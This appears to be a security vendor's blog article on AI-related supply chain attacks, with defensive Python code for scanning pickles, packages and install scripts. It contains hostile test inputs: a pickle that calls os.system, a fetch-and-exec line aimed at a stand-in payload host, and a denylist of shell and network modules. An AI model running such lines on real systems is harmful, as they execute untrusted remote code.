Supply Chain Attacks in the Age of Artificial Intelligence

Organizations build fortified security perimeters, invest in advanced threat detection, and train employees on cybersecurity best practices. Yet attackers increasingly bypass all of this by targeting the vendors and suppliers businesses rely on. This approach has proven devastatingly effective for years, but artificial intelligence has amplified the threat to unprecedented levels.

Attackers now use machine learning to identify vulnerabilities, automate exploitation, and evade detection at scales that seemed impossible just a few years ago. Meanwhile, AI itself has become part of the supply chain, introducing entirely new attack vectors that security teams are only beginning to understand.

The AI Advantage in Modern Supply Chain Attacks

Supply chain attacks exploit trusted vendor relationships to bypass traditional security perimeters. Instead of breaking through your defenses, attackers compromise suppliers who already have legitimate access. Artificial intelligence makes this long-effective strategy faster to execute and harder to detect.

Machine learning algorithms can analyze vast datasets in minutes, identifying vulnerable vendors that human researchers would need weeks to find. Automated systems test thousands of exploitation techniques in parallel, adapting in real time based on what works. Language models generate personalized phishing campaigns convincing enough to slip past the skepticism of trained employees.

The SolarWinds breach reached up to 18,000 organizations through a single compromised software update. AI-enhanced techniques let attackers pursue similar reach with far less effort and better stealth.



Types of AI-Enhanced Supply Chain Attacks

Poisoned Models

Security researchers discovered malicious machine learning models on Hugging Face in 2023 and early 2024, disguised as legitimate tools. These models appeared safe on casual inspection but contained code that executed when they were loaded or deployed.

In one scheme uncovered by Checkmarx, attackers created fake organization accounts on public model repositories. Employees unknowingly joined these organizations and uploaded private AI models to them. The attacker then tampered with one of those models, embedding code that connected to a command-and-control server. When employees used the model, the malware gave the attacker complete control of the machine.

AI models are distributed in binary formats containing millions or even billions of parameters, making manual inspection functionally impossible. Organizations end up trusting whatever they download, which creates ideal conditions for exploitation.
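
Many model formats, including PyTorch checkpoints, are built on Python's pickle serialization, which can import and call arbitrary functions while a file is being loaded. The sketch below assumes you already have the raw pickle bytes (for an archive-based checkpoint, the pickle entry inside it) and uses the standard library's `pickletools` to list the functions the file would import without ever unpickling it. The `SUSPICIOUS_MODULES` denylist is a hypothetical example, and attackers can obfuscate imports, so dedicated model scanners go considerably further.

```python
import io
import pickle
import pickletools

# Hypothetical denylist: imports of these modules inside a model file are red flags.
SUSPICIOUS_MODULES = {"os", "posix", "nt", "subprocess", "socket", "sys",
                      "builtins", "__builtin__", "runpy", "importlib"}

# Opcodes that push a text string; STACK_GLOBAL takes its module and name from these.
STRING_OPCODES = {"UNICODE", "SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8"}


def find_suspicious_imports(data: bytes) -> list[str]:
    """List "module.name" imports in a pickle stream that hit the denylist.

    The stream is only disassembled with pickletools.genops, never unpickled,
    so no code inside it runs.
    """
    findings = []
    strings = []  # string constants seen so far, in order
    for opcode, arg, _pos in pickletools.genops(io.BytesIO(data)):
        if opcode.name in STRING_OPCODES:
            strings.append(arg)
            continue
        if opcode.name == "GLOBAL":
            # Protocols 0-3: the argument is "module name", separated by a space.
            module, name = arg.split(" ", 1)
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
            # Protocol 4+: module and name were pushed as the two preceding strings.
            # Simplification: strings re-fetched from the memo are not tracked.
            module, name = strings[-2], strings[-1]
        else:
            continue
        if module.split(".")[0] in SUSPICIOUS_MODULES:
            findings.append(f"{module}.{name}")
    return findings


if __name__ == "__main__":
    # A plain dictionary of weights imports nothing.
    print(find_suspicious_imports(pickle.dumps({"weights": [0.1, 0.2]})))
    # A hand-written protocol-0 pickle that would call os.system if it were loaded.
    print(find_suspicious_imports(b"cos\nsystem\n(S'echo hi'\ntR."))
```

Static inspection like this is a screening step; loading untrusted checkpoints in an isolated environment, or preferring formats that store only tensors, removes the execution path altogether.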

Training Data Poisoning

MIT and Berkeley studies in 2022 and 2023 demonstrated that models could be poisoned during training. A compromised fraud detection model might ignore specific transaction patterns. A security scanner could fail to flag certain malware families. These manipulations remain hidden until deliberately triggered.

Dataset management systems remain less mature than code repositories, making it difficult to track changes and maintain security. This immaturity lets attackers inject poisoned data without leaving obvious traces.
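
Even without mature dataset tooling, a lightweight manifest of per-record hashes makes silent edits visible. The sketch below is an illustration under stated assumptions: records are JSON-serializable dictionaries keyed by a stable ID, and the transaction data and flipped fraud label are hypothetical. Hashing each record's canonical JSON means a reordering of keys does not register as a change, while a flipped label does.

```python
import hashlib
import json


def record_digest(record: dict) -> str:
    """SHA-256 of a record's canonical JSON, so key order does not change the hash."""
    canonical = json.dumps(record, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


def build_manifest(records: dict[str, dict]) -> dict[str, str]:
    """Map each record ID to the digest of its contents."""
    return {record_id: record_digest(rec) for record_id, rec in records.items()}


def diff_manifests(old: dict[str, str], new: dict[str, str]) -> dict[str, list[str]]:
    """Report records added, removed, or silently modified between two versions."""
    return {
        "added": sorted(new.keys() - old.keys()),
        "removed": sorted(old.keys() - new.keys()),
        "modified": sorted(k for k in old.keys() & new.keys() if old[k] != new[k]),
    }


if __name__ == "__main__":
    v1 = {"tx-1": {"amount": 9400, "label": "fraud"},
          "tx-2": {"amount": 35, "label": "legit"}}
    # Hypothetical poisoning: one fraud label flipped and a new record slipped in.
    v2 = {"tx-1": {"amount": 9400, "label": "legit"},
          "tx-2": {"amount": 35, "label": "legit"},
          "tx-3": {"amount": 9100, "label": "legit"}}
    print(diff_manifests(build_manifest(v1), build_manifest(v2)))
```

Storing each manifest alongside the model trained on it gives reviewers a concrete list of what changed between training runs.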

Malicious Dependencies

Researchers uncovered malicious packages on PyPI in 2023, disguised as machine learning tools but hiding remote access capabilities. Developers downloading them unknowingly compromised their systems.

Attackers now publish malicious packages under names that AI coding assistants tend to hallucinate. When developers accept these auto-suggested dependencies without checking them, they pull malicious code directly into their applications. AI itself becomes the distribution mechanism.
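
One simple guard is to check every suggested dependency against a list of packages your team has already reviewed before installing anything. The sketch below assumes a hypothetical `APPROVED_PACKAGES` allowlist, normalizes names the way PEP 503 does, and uses `difflib` to flag unknown names that closely resemble approved ones, a pattern typical of both typosquats and hallucinated names. The 0.8 similarity cutoff is an arbitrary illustrative choice.

```python
import difflib
import re

# Hypothetical allowlist of packages your organization has already reviewed.
APPROVED_PACKAGES = {"numpy", "pandas", "scikit-learn", "torch", "transformers", "requests"}


def normalize(name: str) -> str:
    """PEP 503 name normalization: runs of '-', '_' and '.' become '-', lowercased."""
    return re.sub(r"[-_.]+", "-", name.strip()).lower()


def review_dependencies(requested: list[str]) -> dict[str, str]:
    """Classify each requested dependency before anyone runs pip install."""
    report = {}
    for name in requested:
        canonical = normalize(name)
        if canonical in APPROVED_PACKAGES:
            report[name] = "approved"
            continue
        # An unknown name that closely resembles an approved one deserves extra scrutiny.
        close = difflib.get_close_matches(canonical, sorted(APPROVED_PACKAGES), n=1, cutoff=0.8)
        report[name] = f"unreviewed (resembles {close[0]})" if close else "unreviewed"
    return report


if __name__ == "__main__":
    print(review_dependencies(["numpy", "Scikit_Learn", "reqeusts", "torch-vision-utils-pro"]))
```

Anything marked "unreviewed" goes to a human for vetting rather than being installed automatically.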

Compromised AI APIs

Organizations integrate external AI APIs for fraud detection, customer service, and analytics, often treating these services as trusted black boxes embedded deep in business processes.

The Langflow incident in January 2025 demonstrated this risk. A vulnerability in this popular Python AI package affected organizations across multiple industries. Widespread adoption meant a single flaw exposed thousands of implementations.

AI-Powered Defense Capabilities



While attackers leverage artificial intelligence, defenders gain equally powerful capabilities. Our supply chain security solutions integrate AI-powered tools that process thousands of events per second and surface patterns that human analysts would struggle to detect manually.

Real-Time Anomaly Detection

AI security systems establish behavioral baselines for normal operations, then flag deviations that might indicate compromise. These tools analyze network traffic patterns, user access rhythms, and system behaviors to distinguish benign anomalies from genuine threats.
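
The baseline-then-deviation idea can be shown with a deliberately simple statistic. Production systems learn from many signals at once; this sketch uses a single hypothetical metric (outbound connections per hour from a build server) and a z-score, flagging values more than three standard deviations from the historical mean. The metric, the data, and the threshold of 3.0 are all illustrative assumptions.

```python
import statistics


def build_baseline(history: list[float]) -> tuple[float, float]:
    """Summarize normal behavior as a mean and sample standard deviation."""
    return statistics.mean(history), statistics.stdev(history)


def flag_anomalies(observations: dict[str, float], baseline: tuple[float, float],
                   threshold: float = 3.0) -> list[tuple[str, float]]:
    """Return (label, z-score) for observations beyond `threshold` standard deviations."""
    mean, stdev = baseline
    flagged = []
    for label, value in observations.items():
        if stdev == 0:
            # A perfectly constant history: any change at all is a deviation.
            z = 0.0 if value == mean else float("inf")
        else:
            z = (value - mean) / stdev
        if abs(z) > threshold:
            flagged.append((label, z))
    return flagged


if __name__ == "__main__":
    # Hypothetical hourly outbound-connection counts from a build server.
    baseline = build_baseline([120, 118, 125, 130, 122, 119, 127, 124])
    print(flag_anomalies({"02:00": 126, "03:00": 410}, baseline))
```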

Machine learning can substantially reduce false positives by learning from historical data. Security teams focus on actual threats instead of chasing phantom vulnerabilities, which improves operational efficiency. Developers who have spent hours investigating non-existent security issues will appreciate this capability.

Automated Security Controls

AI integrates throughout development pipelines to provide continuous protection. Automated systems generate Software Bills of Materials (SBOMs), scan dependencies for vulnerabilities, monitor third-party components, and trigger incident response procedures when threats are detected.
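
As a rough illustration of what an automatically generated SBOM contains, the sketch below inventories the Python packages installed in the current environment with the standard library's `importlib.metadata` and emits a document that borrows CycloneDX JSON field names (`bomFormat`, `specVersion`, `components`, `purl`). It is not validated against the CycloneDX schema and omits most of what dedicated SBOM generators record, such as hashes, licenses, and the dependency graph.

```python
import json
from importlib import metadata


def minimal_sbom() -> dict:
    """Build a minimal, CycloneDX-shaped inventory of installed Python packages."""
    components = []
    for dist in metadata.distributions():
        name = dist.metadata["Name"]
        if not name:
            continue  # skip broken installs that lack a Name field
        version = dist.version
        components.append({
            "type": "library",
            "name": name,
            "version": version,
            # Package URL for PyPI: lowercase, underscores replaced with dashes.
            "purl": f"pkg:pypi/{name.lower().replace('_', '-')}@{version}",
        })
    components.sort(key=lambda c: c["name"].lower())
    return {"bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1,
            "components": components}


if __name__ == "__main__":
    print(json.dumps(minimal_sbom(), indent=2))
```

Regenerating the inventory on every build and diffing it against the previous one is a cheap way to notice a dependency that appeared without review.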

These controls function as force multipliers, enabling security teams to respond at machine speed while directing human expertise toward complex investigations requiring contextual understanding. Continuous vulnerability scanning catches issues before they reach production environments.

Continuous Vendor Monitoring

AI-powered tools track vendor security posture in real time, analyzing security ratings, disclosed vulnerabilities, breach reports, and behavioral changes that might signal compromise. This continuous monitoring matters because 79% of organizations cover less than half of their supply chain with dedicated cybersecurity programs.
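
At its core, continuous vendor monitoring compares each new snapshot of a vendor's posture against the last one and raises alerts on meaningful changes. The sketch below assumes a hypothetical `VendorSnapshot` record (a 0 to 100 rating, a set of open vulnerability identifiers, and a breach flag) and a hypothetical 10-point rating-drop threshold; real feeds would come from rating services, advisories, and breach reports.

```python
from dataclasses import dataclass, field


@dataclass
class VendorSnapshot:
    """Hypothetical point-in-time view of one vendor's security posture."""
    rating: int                                       # e.g. a 0-100 security rating
    open_vulns: set[str] = field(default_factory=set)  # disclosed, unresolved issues
    breach_reported: bool = False


def vendor_alerts(previous: dict[str, VendorSnapshot],
                  current: dict[str, VendorSnapshot],
                  max_drop: int = 10) -> list[str]:
    """Compare two monitoring snapshots and describe changes worth investigating."""
    alerts = []
    for vendor, now in current.items():
        before = previous.get(vendor)
        if before is None:
            alerts.append(f"{vendor}: no baseline yet")
            continue
        if before.rating - now.rating >= max_drop:
            alerts.append(f"{vendor}: rating fell {before.rating} -> {now.rating}")
        new_vulns = now.open_vulns - before.open_vulns
        if new_vulns:
            alerts.append(f"{vendor}: new vulnerabilities {sorted(new_vulns)}")
        if now.breach_reported and not before.breach_reported:
            alerts.append(f"{vendor}: breach reported")
    return alerts


if __name__ == "__main__":
    last_week = {"acme-ml": VendorSnapshot(85, {"VULN-1"}), "datacorp": VendorSnapshot(90)}
    today = {"acme-ml": VendorSnapshot(70, {"VULN-1", "VULN-2"}),
             "datacorp": VendorSnapshot(90), "newvendor": VendorSnapshot(60)}
    for alert in vendor_alerts(last_week, today):
        print(alert)
```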

Practical Defense Strategies

Implement Provenance Tracking

Google’s research on AI supply chain security emphasizes that tamper-proof provenance tracking forms the foundation of effective defense. Organizations need comprehensive metadata about AI artifacts: where they came from, who authored or trained them, what datasets were used, and what source code generated them.

Provenance information serves multiple purposes. If a dataset used in training contains biases or inaccuracies, the resulting model inherits those flaws; tracking dataset provenance lets organizations identify and address such issues before attackers can exploit them. Likewise, if a pretrained model has security vulnerabilities, every model built on top of it faces similar risks.
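
Provenance pays off when something upstream turns out to be bad: the lineage graph tells you everything that inherited the problem. The sketch below assumes provenance has been reduced to a hypothetical `LINEAGE` mapping from each artifact to the artifacts derived from it, and uses a breadth-first traversal to find every downstream model and service affected by a flagged dataset or base model.

```python
from collections import deque

# Hypothetical lineage: each artifact maps to the artifacts derived from it.
LINEAGE = {
    "dataset:transactions-2023": ["model:fraud-base"],
    "model:fraud-base": ["model:fraud-eu", "model:fraud-us"],
    "model:fraud-eu": ["service:eu-scoring-api"],
    "model:fraud-us": [],
    "dataset:support-tickets": ["model:chat-assistant"],
}


def downstream_of(artifact: str, lineage: dict[str, list[str]]) -> set[str]:
    """Breadth-first search for every artifact derived, directly or not, from `artifact`."""
    affected = set()
    queue = deque([artifact])
    while queue:
        current = queue.popleft()
        for child in lineage.get(current, []):
            if child not in affected:  # guard against revisiting shared descendants
                affected.add(child)
                queue.append(child)
    return affected


if __name__ == "__main__":
    # If the 2023 transactions dataset is found to be poisoned, what must be reviewed?
    print(sorted(downstream_of("dataset:transactions-2023", LINEAGE)))
```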

Metadata should be captured when an artifact is created, in a tamper-evident form that cannot be silently modified. Cryptographically signing supply chain artifacts, and verifying those signatures before use, prevents unauthorized models from being integrated into applications.
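
The sketch below shows the shape of a tamper-evident provenance record: the metadata includes the artifact's SHA-256 digest, and the whole record is authenticated so neither the model nor its metadata can be swapped unnoticed. To stay within the standard library it uses HMAC, a shared-secret MAC, as a stand-in for a digital signature. That substitution matters: anyone able to verify an HMAC can also forge one, so production pipelines should use asymmetric signatures instead. The metadata fields and key are hypothetical.

```python
import hashlib
import hmac
import json


def _canonical(record: dict) -> bytes:
    """Serialize the record deterministically so the MAC is reproducible."""
    return json.dumps(record, sort_keys=True).encode("utf-8")


def make_provenance(artifact: bytes, metadata: dict, key: bytes) -> dict:
    """Bind provenance metadata to the artifact's digest and authenticate both."""
    record = dict(metadata, artifact_sha256=hashlib.sha256(artifact).hexdigest())
    mac = hmac.new(key, _canonical(record), hashlib.sha256).hexdigest()
    return {"record": record, "mac": mac}


def verify_provenance(artifact: bytes, envelope: dict, key: bytes) -> bool:
    """Reject the artifact if either its metadata or its bytes were altered."""
    record = envelope["record"]
    expected = hmac.new(key, _canonical(record), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, envelope["mac"]):
        return False  # metadata was modified after creation
    return hashlib.sha256(artifact).hexdigest() == record["artifact_sha256"]


if __name__ == "__main__":
    key = b"demo-key-not-for-production"
    model_bytes = b"serialized model weights"
    envelope = make_provenance(model_bytes, {"source": "internal-training",
                                             "dataset": "transactions-2023",
                                             "trained_by": "ml-platform-team"}, key)
    print(verify_provenance(model_bytes, envelope, key))
    print(verify_provenance(model_bytes + b"!", envelope, key))
```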

Secure AI Development Environments

Protect machine learning development with the same rigor applied to traditional software. Verify training dataset integrity through checksums and cryptographic validation. Validate model behavior against established baselines before deployment. Scan AI models for embedded malicious code using specialized security tools.
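
Validating behavior against a baseline can be as simple as replaying a fixed "golden" set of labeled inputs before each deployment and blocking the release if accuracy drops or specific cases change. The sketch below assumes the model is exposed as a `predict` callable; the golden set, the toy fraud rules, and the 2-point tolerance are hypothetical. The second model mimics a poisoned one that ignores fraud from one merchant, the kind of hidden trigger described earlier.

```python
from typing import Any, Callable


def validate_model(predict: Callable[[Any], Any],
                   golden_set: list[tuple[Any, Any]],
                   baseline_accuracy: float,
                   max_drop: float = 0.02) -> tuple[bool, float, list[Any]]:
    """Replay known cases; fail if accuracy falls more than `max_drop` below baseline."""
    mismatches = [inputs for inputs, expected in golden_set if predict(inputs) != expected]
    accuracy = 1 - len(mismatches) / len(golden_set)
    return accuracy >= baseline_accuracy - max_drop, accuracy, mismatches


# Hypothetical golden set for a fraud model, including a known-fraud merchant case.
GOLDEN = [({"amount": 50}, "ok"), ({"amount": 5000}, "fraud"),
          ({"amount": 20}, "ok"), ({"amount": 9000, "merchant": "m-123"}, "fraud")]


def trusted_model(tx):
    return "fraud" if tx["amount"] > 1000 else "ok"


def tampered_model(tx):
    # Behaves normally except for one trigger merchant.
    return "ok" if tx.get("merchant") == "m-123" else trusted_model(tx)


if __name__ == "__main__":
    print(validate_model(trusted_model, GOLDEN, baseline_accuracy=1.0))
    print(validate_model(tampered_model, GOLDEN, baseline_accuracy=1.0))
```

Because triggers are chosen by the attacker, a golden set cannot guarantee detection; it does catch regressions on the cases you already know matter.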

Maintain detailed records of model development, including training parameters, dataset sources, framework versions, and modification history. This documentation enables forensic analysis when suspicious behaviors emerge.

Validate Third-Party AI Components

Before integrating external models or libraries, conduct thorough assessments. Request documentation of training data sources, model development practices, security testing results, and incident response capabilities. Never deploy AI components without testing them in isolated environments first.

Run security testing against external AI services before granting them production access. Monitor API traffic for anomalies and implement strict access controls to limit which external services can reach your infrastructure.
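
Strict access controls usually live in a proxy or firewall, but the decision they enforce is simple enough to sketch. The example below assumes a hypothetical `ALLOWED_AI_HOSTS` allowlist of external AI endpoints that have passed review, and permits a request only over HTTPS to an exact hostname match. Parsing with `urllib.parse.urlsplit` rather than matching substrings prevents look-alike hosts from slipping through.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist of external AI endpoints approved after security review.
ALLOWED_AI_HOSTS = {"api.approved-ai-vendor.example", "inference.internal.example"}


def egress_allowed(url: str) -> bool:
    """Allow only HTTPS requests whose exact hostname is on the allowlist."""
    parts = urlsplit(url)
    host = parts.hostname or ""  # .hostname is lowercased and excludes port and user info
    return parts.scheme == "https" and host in ALLOWED_AI_HOSTS


if __name__ == "__main__":
    for url in ["https://api.approved-ai-vendor.example/v1/score",
                "https://api.approved-ai-vendor.example.attacker.example/v1/score",
                "http://api.approved-ai-vendor.example/v1/score"]:
        print(url, egress_allowed(url))
```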

Extend Threat Detection to AI Behaviors

Traditional security monitoring must expand to include AI-specific indicators. Set up systems that spot when models suddenly behave outside their intended functions. Unexpected outputs, unusual data requests, strange error patterns, or performance degradation could signal tampering or compromise.
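
One way to notice a model behaving outside its intended function is to compare the distribution of its outputs against a trusted baseline period. The sketch below computes the population stability index (PSI) over categorical outputs; the labels and data are hypothetical, and the 0.2 threshold is only a commonly cited rule of thumb for a significant shift, not a universal standard. Here a fraud model that suddenly stops sending transactions to review produces a large PSI even though its overall behavior looks plausible.

```python
import math
from collections import Counter


def psi(expected_labels: list[str], observed_labels: list[str], eps: float = 1e-6) -> float:
    """Population stability index between a baseline and a current output distribution."""
    categories = set(expected_labels) | set(observed_labels)
    exp_counts, obs_counts = Counter(expected_labels), Counter(observed_labels)
    score = 0.0
    for category in categories:
        # eps keeps categories that appear in only one window from causing log(0).
        e = max(exp_counts[category] / len(expected_labels), eps)
        o = max(obs_counts[category] / len(observed_labels), eps)
        score += (o - e) * math.log(o / e)
    return score


if __name__ == "__main__":
    baseline = ["approve"] * 90 + ["review"] * 10
    this_week = ["approve"] * 99 + ["review"] * 1
    drift = psi(baseline, this_week)
    print(f"PSI={drift:.3f}", "investigate" if drift > 0.2 else "stable")
```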

Deploy specialized tools, such as Datadog's open-source GuardDog, to identify malicious packages in registries such as PyPI and npm. Code Security solutions provide visibility into risks in the third-party libraries that attackers frequently exploit.
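
Scanners of this kind look for behaviors that legitimate packages rarely need at install time, such as network access or executing dynamically built code. The sketch below is not GuardDog and does not reproduce its rules; it illustrates one such heuristic by parsing an install script with Python's `ast` module, without running it, and reporting network-related imports and calls to `exec`, `eval`, or `compile`. The module lists are hypothetical and far from exhaustive.

```python
import ast

# Hypothetical heuristics: install scripts rarely need these.
NETWORK_MODULES = {"socket", "urllib", "urllib.request", "http.client", "requests"}
DYNAMIC_EXEC = {"exec", "eval", "compile"}


def scan_install_script(source: str) -> list[str]:
    """Statically flag risky patterns in a setup.py-style script, ordered by line."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name in NETWORK_MODULES:
                    findings.append((node.lineno, f"imports {alias.name}"))
        elif isinstance(node, ast.ImportFrom) and node.module in NETWORK_MODULES:
            findings.append((node.lineno, f"imports from {node.module}"))
        elif (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
              and node.func.id in DYNAMIC_EXEC):
            findings.append((node.lineno, f"calls {node.func.id}()"))
    # ast.walk is breadth-first, so sort to report findings in source order.
    return [f"line {lineno}: {message}" for lineno, message in sorted(findings)]


if __name__ == "__main__":
    suspicious = ("import setuptools\n"
                  "import urllib.request\n"
                  "exec(urllib.request.urlopen('http://payload.example/p').read())\n"
                  "setuptools.setup(name='demo')\n")
    for finding in scan_install_script(suspicious):
        print(finding)
```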

Strengthen Vendor Requirements

Establish rigorous security standards for third-party vendors providing AI services. Require transparency about training data sources, model development practices, security testing protocols, and incident response capabilities. If vendors use AI, demand detailed documentation of their machine learning security practices.

Continuously assess vendor security rather than relying on initial due diligence. Vendor risk profiles change over time, and ongoing monitoring catches emerging vulnerabilities before attackers exploit them.

Conclusion

Artificial intelligence has changed supply chain attack dynamics, with attackers using machine learning at unprecedented scale. Organizations can unintentionally expand their attack surface by adopting compromised models, poisoned packages, and vulnerable APIs.

AI offers real benefits, but trusting it requires scrutiny: asking tough questions, demanding transparency, and verifying components. Future attacks may target models, APIs, or packages deep within ML pipelines, not just software updates. Contact us to learn how our AI-driven security programs can defend against these emerging threats.

Governance and Policy Management